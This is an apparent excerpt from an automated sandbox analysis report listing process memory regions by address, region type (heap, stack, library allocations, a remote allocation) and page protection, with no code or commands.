page read and write
|
||
|
1EB29C00000
|
remote allocation
|
page read and write
|
||
|
EB23A7E000
|
stack
|
page read and write
|
||
|
20916302000
|
heap
|
page read and write
|
||
|
1EB298E3000
|
heap
|
page read and write
|
||
|
7FF879580000
|
trusted library allocation
|
page read and write
|
||
|
1D0E22A0000
|
heap
|
page read and write
|
||
|
20916140000
|
heap
|
page read and write
|
||
|
1D0F426F000
|
trusted library allocation
|
page read and write
|
||
|
1EB25440000
|
trusted library section
|
page readonly
|
||
|
2091622B000
|
heap
|
page read and write
|
||
|
7FF87928C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EB29B20000
|
trusted library allocation
|
page read and write
|
||
|
2AEE50A0000
|
heap
|
page read and write
|
||
|
7FF8794E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF879500000
|
trusted library allocation
|
page read and write
|
||
|
1D0E3DB7000
|
heap
|
page read and write
|
||
|
1D0E20B0000
|
heap
|
page read and write
|
||
|
1EB25140000
|
trusted library allocation
|
page read and write
|
||
|
2AEDCB39000
|
trusted library allocation
|
page read and write
|
||
|
2AECD5B2000
|
trusted library allocation
|
page read and write
|
||
|
7FF8794F0000
|
trusted library allocation
|
page read and write
|
||
|
3604DFE000
|
unkown
|
page readonly
|
||
|
7FF879440000
|
trusted library allocation
|
page read and write
|
||
|
1D0E22C4000
|
heap
|
page read and write
|
||
|
A4D16FF000
|
stack
|
page read and write
|
||
|
A4D14FE000
|
stack
|
page read and write
|
||
|
EB23F7B000
|
stack
|
page read and write
|
||
|
1EB24D1B000
|
heap
|
page read and write
|
||
|
7FF8794A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF879450000
|
trusted library allocation
|
page read and write
|
||
|
7FF879490000
|
trusted library allocation
|
page read and write
|
||
|
5F7F9FC000
|
stack
|
page read and write
|
||
|
7FF879480000
|
trusted library allocation
|
page read and write
|
||
|
7FF8793C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF879222000
|
trusted library allocation
|
page read and write
|
||
|
7FF879412000
|
trusted library allocation
|
page read and write
|
||
|
1F6D13B8000
|
heap
|
page read and write
|
||
|
1D0E5BC2000
|
trusted library allocation
|
page read and write
|
||
|
7FF8794D0000
|
trusted library allocation
|
page read and write
|
||
|
1D29DCE000
|
stack
|
page read and write
|
||
|
7FF8792F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
EB249CE000
|
stack
|
page read and write
|
||
|
1EB29A70000
|
trusted library allocation
|
page read and write
|
||
|
1EB24428000
|
heap
|
page read and write
|
||
|
1F6D1360000
|
heap
|
page read and write
|
||
|
1EB24D0C000
|
heap
|
page read and write
|
||
|
2AECE113000
|
trusted library allocation
|
page read and write
|
||
|
7FF87922D000
|
trusted library allocation
|
page execute and read and write
|
||
|
EB23DFE000
|
stack
|
page read and write
|
||
|
1EB24360000
|
heap
|
page read and write
|
||
|
3603B2C000
|
stack
|
page read and write
|
||
|
A4D13FE000
|
stack
|
page read and write
|
||
|
1D2917C000
|
stack
|
page read and write
|
||
|
1D0FC0DD000
|
heap
|
page read and write
|
||
|
1D0E58E8000
|
trusted library allocation
|
page read and write
|
||
|
2AEE4A96000
|
heap
|
page read and write
|
||
|
36053FB000
|
stack
|
page read and write
|
||
|
1EB24D02000
|
heap
|
page read and write
|
||
|
1EB29B70000
|
trusted library allocation
|
page read and write
|
||
|
7FF8792E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20916262000
|
heap
|
page read and write
|
||
|
236BDE4A000
|
heap
|
page read and write
|
||
|
7FF879402000
|
trusted library allocation
|
page read and write
|
||
|
7FF879470000
|
trusted library allocation
|
page read and write
|
||
|
2AEE4985000
|
heap
|
page read and write
|
||
|
7FF8794F0000
|
trusted library allocation
|
page read and write
|
||
|
1D0E2210000
|
trusted library allocation
|
page read and write
|
||
|
1EB25420000
|
trusted library section
|
page readonly
|
||
|
1D0E3F81000
|
trusted library allocation
|
page read and write
|
||
|
2091626B000
|
heap
|
page read and write
|
||
|
1D0E210C000
|
heap
|
page read and write
|
||
|
2AEDC990000
|
trusted library allocation
|
page read and write
|
||
|
7FF879590000
|
trusted library allocation
|
page read and write
|
||
|
1D0E5709000
|
trusted library allocation
|
page read and write
|
||
|
2AECC4E0000
|
heap
|
page execute and read and write
|
||
|
236BFD10000
|
heap
|
page read and write
|
||
|
1EB244A2000
|
heap
|
page read and write
|
||
|
1EB24D00000
|
heap
|
page read and write
|
||
|
1D0E2260000
|
trusted library allocation
|
page read and write
|
||
|
236BDDD0000
|
heap
|
page read and write
|
||
|
36058FB000
|
stack
|
page read and write
|
||
|
7FF879316000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EB297C0000
|
trusted library allocation
|
page read and write
|
||
|
EB23E7F000
|
stack
|
page read and write
|
||
|
1D0FC056000
|
heap
|
page execute and read and write
|
||
|
1D0FC09D000
|
heap
|
page read and write
|
||
|
7FF879410000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EB24D13000
|
heap
|
page read and write
|
||
|
20916258000
|
heap
|
page read and write
|
||
|
2AECCBB2000
|
trusted library allocation
|
page read and write
|
||
|
36043FE000
|
unkown
|
page readonly
|
||
|
1EB244B4000
|
heap
|
page read and write
|
||
|
1EB2445B000
|
heap
|
page read and write
|
||
|
5F7F7FF000
|
stack
|
page read and write
|
||
|
1EB24497000
|
heap
|
page read and write
|
||
|
3604E7E000
|
stack
|
page read and write
|
||
|
1D0E21F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF879232000
|
trusted library allocation
|
page read and write
|
||
|
236BDDE0000
|
heap
|
page read and write
|
||
|
7FF879224000
|
trusted library allocation
|
page read and write
|
||
|
7FF8793F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D0E52E2000
|
trusted library allocation
|
page read and write
|
||
|
2AECAAA0000
|
heap
|
page read and write
|
||
|
2AEE4C00000
|
heap
|
page execute and read and write
|
||
|
1EB29A42000
|
trusted library allocation
|
page read and write
|
||
|
7FF87923D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2AECE2E8000
|
trusted library allocation
|
page read and write
|
||
|
1D0FC060000
|
heap
|
page read and write
|
||
|
20916040000
|
heap
|
page read and write
|
||
|
1D0FC458000
|
heap
|
page read and write
|
||
|
1D0E22B4000
|
heap
|
page read and write
|
||
|
2AEE4B85000
|
heap
|
page read and write
|
||
|
1D0E5966000
|
trusted library allocation
|
page read and write
|
||
|
EB238FE000
|
stack
|
page read and write
|
||
|
1D0FC469000
|
heap
|
page read and write
|
||
|
1EB29800000
|
heap
|
page read and write
|
||
|
7FF879340000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EB24413000
|
heap
|
page read and write
|
||
|
1EB24BE1000
|
trusted library allocation
|
page read and write
|
||
|
1D290F8000
|
stack
|
page read and write
|
||
|
3604EFE000
|
unkown
|
page readonly
|
||
|
1EB298F4000
|
heap
|
page read and write
|
||
|
2AEE4D85000
|
heap
|
page read and write
|
||
|
1D0E5576000
|
trusted library allocation
|
page read and write
|
||
|
1EB29905000
|
heap
|
page read and write
|
||
|
A4D18FC000
|
stack
|
page read and write
|
||
|
1D0FC420000
|
heap
|
page read and write
|
||
|
7FF879580000
|
trusted library allocation
|
page read and write
|
||
|
36050FE000
|
unkown
|
page readonly
|
||
|
2AECC634000
|
heap
|
page read and write
|
||
|
7FF87924B000
|
trusted library allocation
|
page read and write
|
||
|
2AECE5C0000
|
trusted library allocation
|
page read and write
|
||
|
20916200000
|
heap
|
page read and write
|
||
|
1EB24280000
|
heap
|
page read and write
|
||
|
2AECE10A000
|
trusted library allocation
|
page read and write
|
||
|
36059FE000
|
unkown
|
page readonly
|
||
|
7FF879420000
|
trusted library allocation
|
page read and write
|
||
|
36046FB000
|
stack
|
page read and write
|
||
|
3F45DBE000
|
stack
|
page read and write
|
||
|
3604BFE000
|
unkown
|
page readonly
|
||
|
1F6D2DF4000
|
heap
|
page read and write
|
||
|
1EB29B80000
|
trusted library allocation
|
page read and write
|
||
|
7FF8794C0000
|
trusted library allocation
|
page read and write
|
||
|
17FF4B60000
|
heap
|
page read and write
|
||
|
2AECAAE2000
|
heap
|
page read and write
|
||
|
1D0E2070000
|
heap
|
page read and write
|
||
|
2AECE0A3000
|
trusted library allocation
|
page read and write
|
||
|
7FF879430000
|
trusted library allocation
|
page read and write
|
||
|
2AECC490000
|
trusted library allocation
|
page read and write
|
||
|
1D2927E000
|
stack
|
page read and write
|
||
|
1D29E4D000
|
stack
|
page read and write
|
||
|
7FF879223000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D0E2138000
|
heap
|
page read and write
|
||
|
7FF879240000
|
trusted library allocation
|
page read and write
|
||
|
1EB25430000
|
trusted library section
|
page readonly
|
||
|
7FF879510000
|
trusted library allocation
|
page read and write
|
||
|
36042FE000
|
stack
|
page read and write
|
||
|
7FF879500000
|
trusted library allocation
|
page read and write
|
||
|
1EB2990A000
|
heap
|
page read and write
|
||
|
17FF31A0000
|
heap
|
page read and write
|
There are 443 hidden memdumps, click here to show them.